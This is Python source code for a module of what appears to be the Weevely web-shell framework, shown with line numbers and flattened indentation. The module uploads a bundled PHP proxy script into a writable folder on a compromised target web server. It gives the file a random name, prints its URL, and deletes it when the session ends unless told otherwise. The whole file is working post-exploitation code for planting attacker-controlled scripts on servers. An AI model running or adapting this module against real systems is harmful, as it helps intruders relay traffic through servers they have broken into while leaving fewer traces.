1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
|
from core.vectors import ModuleExec
from core.module import Module
from core import modules
from core import messages
from core.loggers import log
import utils
import atexit
import os
class Phpproxy(Module):
"""Install PHP proxy on the target."""
def init(self):
self.register_info(
{
'author': [
'Emilio Pinna'
],
'license': 'GPLv3'
}
)
self.register_arguments([
{ 'name' : 'rpath', 'help' : 'Remote path where to install the PHP proxy script. If it is a folder find the first writable folder in it', 'default' : '.', 'nargs' : '?' },
{ 'name' : '-rname', 'help' : 'Set a specific file name ending with \'.php\'. Default is random', 'default' : '%s.php' % utils.strings.randstr(6).decode('utf-8') },
{ 'name' : '-no-autoremove', 'action' : 'store_true', 'default' : False, 'help' : 'Do not autoremove on exit' }
])
def run(self, **kwargs):
with open(os.path.join(self.folder, 'poxy.php'), 'r') as proxyfile:
proxycontent = proxyfile.read()
result = ModuleExec(
'file_upload2web',
[
'-content',
proxycontent,
self.args['rname'],
self.args['rpath']
]
).run(self.args)
if not (
result and
len(result[0]) == 2 and
result[0][0] and
result[0][1]
): return
log.warn(
messages.module_net_phpproxy.phpproxy_installed_to_s_browser_to_s % (
result[0][0],
result[0][1]
)
)
if self.args['no_autoremove']:
log.warn(messages.module_net_phpproxy.proxy_script_manually_remove_s % (result[0][0]))
else:
log.warn(messages.module_net_phpproxy.proxy_script_removed)
atexit.register(
ModuleExec('file_rm', [
result[0][0]
]
).run
)
return result
def print_result(self, result):
pass
|
